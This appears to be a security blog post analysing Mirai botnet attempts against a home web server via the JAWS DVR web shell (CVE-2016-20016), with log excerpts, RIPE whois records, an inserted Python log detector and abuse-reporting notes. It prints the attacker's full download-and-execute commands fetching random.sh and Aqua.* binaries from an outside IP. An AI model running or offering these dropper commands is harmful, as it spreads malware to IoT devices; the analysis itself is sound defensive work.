Christopher Chmielewski

BOLO: Mirai Attack Against IoT Devices

January 6, 2025

1. Introduction

I have been running a home web server to host this website for the last 9 months. Over the Christmas break I set up a home SOC (Security Operations Center) to monitor the traffic to my website more easily, as opposed to viewing the web server logs directly. After setting up syslog and Splunk, I dug into the log data to see what kind of attacks the server is facing. There are, of course, a lot.

One set of log events stuck out to me as curious because the attacker had modified their user-agent string to "KrebsOnSecurity". For those of you who are unaware, KrebsOnSecurity is the website of Brian Krebs, a leading cybersecurity investigative journalist. Brian Krebs has been targeted by threat actors in the past due to him exposing various cybercriminals. Perhaps this attacker changed his user-agent string as a joke.

Note that I've modified HTTP to HTTX for safety in the listings below.

2025-01-04T00:03:36-05:00 cyrodiil http_access 91.224.92.18 - - [04/Jan/2025:00:03:36 -0500] GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+httx:/\\/194.37.81.64/random.sh;chmod+777+random.sh;./random.sh HTTP/1.1 404 492 - KrebsOnSecurity 
2025-01-03T20:40:07-05:00 cyrodiil http_access 91.224.92.18 - - [03/Jan/2025:20:40:07 -0500] GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+httx:/\\/194.37.81.64/random.sh;chmod+777+random.sh;./random.sh HTTP/1.1 404 492 - KrebsOnSecurity 
2025-01-03T17:47:03-05:00 cyrodiil http_access 91.224.92.18 - - [03/Jan/2025:17:47:03 -0500] GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+httx:/\\/194.37.81.64/random.sh;chmod+777+random.sh;./random.sh HTTP/1.1 404 492 - KrebsOnSecurity 
2025-01-03T14:28:24-05:00 cyrodiil http_access 91.224.92.18 - - [03/Jan/2025:14:28:24 -0500] GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+httx:/\\/194.37.81.64/random.sh;chmod+777+random.sh;./random.sh HTTP/1.1 404 492 - KrebsOnSecurity 
2025-01-03T11:51:18-05:00 cyrodiil http_access 91.224.92.18 - - [03/Jan/2025:11:51:18 -0500] GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+httx:/\\/194.37.81.64/random.sh;chmod+777+random.sh;./random.sh HTTP/1.1 404 492 - KrebsOnSecurity 
2025-01-03T09:01:26-05:00 cyrodiil http_access 91.224.92.18 - - [03/Jan/2025:09:01:26 -0500] GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+httx:/\\/194.37.81.64/random.sh;chmod+777+random.sh;./random.sh HTTP/1.1 404 492 - KrebsOnSecurity 
2025-01-03T02:58:12-05:00 cyrodiil http_access 91.224.92.18 - - [03/Jan/2025:02:58:12 -0500] GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+httx:/\\/194.37.81.64/random.sh;chmod+777+random.sh;./random.sh HTTP/1.1 404 492 - KrebsOnSecurity 
2025-01-02T18:57:10-05:00 cyrodiil http_access 91.224.92.18 - - [02/Jan/2025:18:57:10 -0500] GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+httx:/\\/194.37.81.64/random.sh;chmod+777+random.sh;./random.sh HTTP/1.1 404 492 - KrebsOnSecurity 
2025-01-02T15:13:22-05:00 cyrodiil http_access 91.224.92.18 - - [02/Jan/2025:15:13:22 -0500] GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+httx:/\\/194.37.81.64/random.sh;chmod+777+random.sh;./random.sh HTTP/1.1 404 492 - KrebsOnSecurity 

2. Infiltration: Web Shell for Free

The log events show that the attacker is attempting to get shell access to the web server in order to download a script called random.sh, which, when executed, downloads malware onto the system.

It seemed odd to me that the exploit this attacker was attempting directly called the system shell and passed the commands to it in the URL query string: GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+httx:/\\/194.37.81.64/random.sh;chmod+777+random.sh;./random.sh. This seemed too simple. What kind of web server allows direct shell access like this? From my previous project I learned that gaining shell access remotely on a web server typically relies on a combination of vulnerabilities, such as server misconfiguration and software vulnerabilities.

Digging around online I found CVE-2016-20016, also known as the "JAWS webserver RCE". According to the sources listed under the CVE, this attack targets MVPower CCTV DVRs, which are DVRs used for recording the video feeds from CCTV cameras. A full technical explanation of the vulnerabilities in this device can be found here (also archived here as a PDF) in a penetration testing report from pentestpartners.com; the section "Built-in web shell" covers the vulnerability our attacker is attempting to exploit. Reading this report reveals that this is a horridly insecure device. To quote the report: "we have a remote, unauthenticated root shell, that is undocumented and not possible to disable, built-in to the device. This is as bad as it gets".
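As an added worked example (my code, not part of the original post), the following Python parses lines in the syslog-forwarded access-log layout shown above, decodes the /shell? query string and flags the download-and-execute pattern, pulling out the source IP, payload host and user-agent that an abuse report needs. The sample lines are constructed from the post's format (scheme defanged to "httx" as in the post); the marker list and the three-marker threshold are my own assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample: the first line mirrors the JAWS /shell? probe from the post,
# the second is an ordinary request that must not alert.
SAMPLE_LOG = """\
2025-01-04T00:03:36-05:00 cyrodiil http_access 91.224.92.18 - - [04/Jan/2025:00:03:36 -0500] GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+httx://194.37.81.64/random.sh;chmod+777+random.sh;./random.sh HTTP/1.1 404 492 - KrebsOnSecurity
2025-01-04T00:05:10-05:00 cyrodiil http_access 203.0.113.7 - - [04/Jan/2025:00:05:10 -0500] GET /index.html HTTP/1.1 200 1532 - Mozilla/5.0
"""

# syslog timestamp, host, tag, client IP, ident, user, [apache timestamp], request line,
# status, bytes, referer, user-agent
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) http_access (?P<src>\S+) \S+ \S+ \[[^\]]+\] "
    r"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/\S+ (?P<status>\d{3}) \S+ \S+ (?P<ua>.*)$"
)
# Hallmarks of the dropper one-liner: fetch a remote file, make it executable, run it.
# Any single marker is weak on its own (assumed threshold: three of them together).
DROPPER_MARKERS = ("wget ", "curl ", "chmod 777", "./")
URL_RE = re.compile(r"(?:https?|httx)://([0-9a-zA-Z.\-]+)")

def analyze_line(line):
    """Return an alert dict for a /shell? request, or None for anything else."""
    m = LINE_RE.match(line.strip())
    if not m or not m.group("path").startswith("/shell?"):
        return None
    cmd = unquote_plus(m.group("path")[len("/shell?"):])  # '+' back to spaces
    hits = [mk for mk in DROPPER_MARKERS if mk in cmd]
    status = int(m.group("status"))
    return {
        "src_ip": m.group("src"),
        "user_agent": m.group("ua"),
        "command": cmd,
        "payload_hosts": sorted(set(URL_RE.findall(cmd))),
        "dropper": len(hits) >= 3,
        # A 4xx means this host has no /shell endpoint: a failed probe worth
        # reporting, not a compromise. A 2xx would warrant incident response.
        "attempt_only": status >= 400,
    }

def scan(log_text):
    """Run the detector over a whole log and keep only the alerts."""
    return [r for r in map(analyze_line, log_text.splitlines()) if r]
```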

3. Mirai Malware

Once random.sh (see the VirusTotal report) is executed, it downloads and executes a binary labeled Aqua.XXX, where each extension presumably corresponds to a different instruction set architecture (ISA). I downloaded a copy of this malware in a VM (virtual machine) and uploaded it to VirusTotal in order to ID it (see the VirusTotal report). It turns out to be the well-known Mirai malware, which is used to turn Linux machines, IoT devices in particular, into bots for a botnet. In fact, this very malware was used to DDoS (distributed denial of service) krebsonsecurity.com in 2016. Perhaps this explains the "KrebsOnSecurity" user-agent string.

cd /tmp; wget httx://194.37.81.64/Aqua.x86; curl -O httx://194.37.81.64/Aqua.x86; chmod 777 *; ./Aqua.x86 jaws;
cd /tmp; wget httx://194.37.81.64/Aqua.x86_64; curl -O httx://194.37.81.64/Aqua.x86_64; chmod 777 *; ./Aqua.x86_64 jaws;
cd /tmp; wget httx://194.37.81.64/Aqua.arm7; curl -O httx://194.37.81.64/Aqua.arm7; chmod 777 *; ./Aqua.arm7 jaws;
cd /tmp; wget httx://194.37.81.64/Aqua.arm6; curl -O httx://194.37.81.64/Aqua.arm6; chmod 777 *; ./Aqua.arm6 jaws;
cd /tmp; wget httx://194.37.81.64/Aqua.arm5; curl -O httx://194.37.81.64/Aqua.arm5; chmod 777 *; ./Aqua.arm5 jaws;
cd /tmp; wget httx://194.37.81.64/Aqua.arm4; curl -O httx://194.37.81.64/Aqua.arm4; chmod 777 *; ./Aqua.arm4 jaws;
cd /tmp; wget httx://194.37.81.64/Aqua.mips; curl -O httx://194.37.81.64/Aqua.mips; chmod 777 *; ./Aqua.mips jaws;
cd /tmp; wget httx://194.37.81.64/Aqua.mpsl; curl -O httx://194.37.81.64/Aqua.mpsl; chmod 777 *; ./Aqua.mpsl jaws;
cd /tmp; wget httx://194.37.81.64/Aqua.ppc; curl -O httx://194.37.81.64/Aqua.ppc; chmod 777 *; ./Aqua.ppc jaws;
cd /tmp; wget httx://194.37.81.64/Aqua.sh4; curl -O httx://194.37.81.64/Aqua.sh4; chmod 777 *; ./Aqua.sh4 jaws;
cd /tmp; wget httx://194.37.81.64/Aqua.i686; curl -O httx://194.37.81.64/Aqua.i686; chmod 777 *; ./Aqua.i686 jaws;
cd /tmp; wget httx://194.37.81.64/Aqua.m68k; curl -O httx://194.37.81.64/Aqua.m68k; chmod 777 *; ./Aqua.m68k jaws;
cd /tmp; wget httx://194.37.81.64/Aqua.mips; curl -O httx://194.37.81.64/Aqua.mips; chmod 777 *; ./Aqua.mips jaws;

4. Attacker Operational Details

The attacker initially makes an HTTP GET request to exploit CVE-2016-20016 from IP address 91.224.92.18, located in Vilnius, Lithuania. This IP address belongs to a datacenter company called serveroffer.net.

Once the attacker gains shell access, he attempts to download the Mirai malware from IP address 194.37.81.64, located in Amsterdam, Netherlands, which belongs to another datacenter, kamatera.com.

I have reported the attacker to both of these datacenters' abuse emails.

% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See https://docs.db.ripe.net/terms-conditions.html

% Note: this output has been filtered.
%       To receive output for a database update, use the "-B" flag.

% Information related to '91.224.92.0 - 91.224.92.255'

% Abuse contact for '91.224.92.0 - 91.224.92.255' is 'admin@serveroffer.lt'

inetnum:        91.224.92.0 - 91.224.92.255
netname:        SERVEROFFER_LT
org:            ORG-UHB2-RIPE
descr:          Cloud hosting
country:        LT
geoloc:         54.669531 25.270872
admin-c:        SA36963-RIPE
tech-c:         SA36963-RIPE
status:         ASSIGNED PA
mnt-by:         BSTLT-MNT
created:        2019-07-03T19:41:09Z
last-modified:  2019-07-03T19:41:09Z
source:         RIPE

organisation:   ORG-UHB2-RIPE
org-name:       UAB Host Baltic
org-type:       OTHER
address:        Draugystes str. 19, 51230 Kaunas, LITHUANIA
abuse-c:        SA36963-RIPE
mnt-ref:        BSTLT-MNT
mnt-by:         BSTLT-MNT
created:        2016-10-05T09:56:12Z
last-modified:  2016-10-05T09:56:12Z
source:         RIPE # Filtered

role:           Serveroffer admin
address:        UAB Host Baltic, Draugystes str. 19, 51230 Kaunas, LITHUANIA
abuse-mailbox:  admin@serveroffer.lt
nic-hdl:        SA36963-RIPE
mnt-by:         BSTLT-MNT
created:        2016-10-05T09:49:18Z
last-modified:  2016-10-05T09:55:58Z
source:         RIPE # Filtered

% Information related to '91.224.92.0/24AS133398'

route:          91.224.92.0/24
descr:          UAB Host Baltic
origin:         AS133398
mnt-by:         BSTLT-MNT
created:        2019-03-16T00:18:00Z
last-modified:  2019-03-16T00:18:42Z
source:         RIPE

% Information related to '91.224.92.0/24AS209605'

route:          91.224.92.0/24
descr:          UAB Host Baltic
origin:         AS209605
mnt-by:         BSTLT-MNT
created:        2023-03-20T00:06:15Z
last-modified:  2023-03-20T00:06:15Z
source:         RIPE

% This query was served by the RIPE Database Query Service version 1.114 (SHETLAND)

% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See https://docs.db.ripe.net/terms-conditions.html

% Note: this output has been filtered.
%       To receive output for a database update, use the "-B" flag.

% Information related to '194.37.81.0 - 194.37.81.255'

% Abuse contact for '194.37.81.0 - 194.37.81.255' is 'abuse@cloudwm.com'

inetnum:        194.37.81.0 - 194.37.81.255
netname:        CLOUDWEBMANAGE-EU
country:        NL
mnt-by:         CloudWebManage-MNT
admin-c:        CWM7-RIPE
tech-c:         CWM7-RIPE
status:         ASSIGNED PA
geofeed:        https://www.kamatera.com/geofeed.csv
created:        2024-02-28T10:35:25Z
last-modified:  2024-02-28T10:35:25Z
source:         RIPE

role:           Cloud Web Manage
admin-c:        YA57445-RIPE
tech-c:         YA57445-RIPE
address:        15 Madison Ave., New York City, New York, USA
nic-hdl:        CWM7-RIPE
mnt-by:         CloudWebManage-MNT
created:        2016-08-23T19:39:53Z
last-modified:  2019-12-01T17:59:28Z
source:         RIPE # Filtered
abuse-mailbox:  abuse@cloudwm.com

% Information related to '194.37.81.0/24AS41436'

route:          194.37.81.0/24
descr:          CLOUDWEBMANAGE-EU
origin:         AS41436
mnt-by:         CloudWebManage-MNT
created:        2024-02-28T10:36:00Z
last-modified:  2024-02-28T10:36:00Z
source:         RIPE

% This query was served by the RIPE Database Query Service version 1.114 (SHETLAND)  

5. Conclusion

The exploitation of the web shell (CVE-2016-20016) and the hijacking of MVPower CCTV DVRs as bots was one of the modi operandi of the 2016 Mirai DDoS attacks. It's interesting to note that in 2025 this exact MO is still being used, which implies that many of the affected IoT devices, MVPower CCTV DVRs and surely many others, are still online and unpatched (many IoT devices are not patchable) 9 years after they were originally exploited, making it worthwhile for attackers to continue to target these devices in order to build botnets.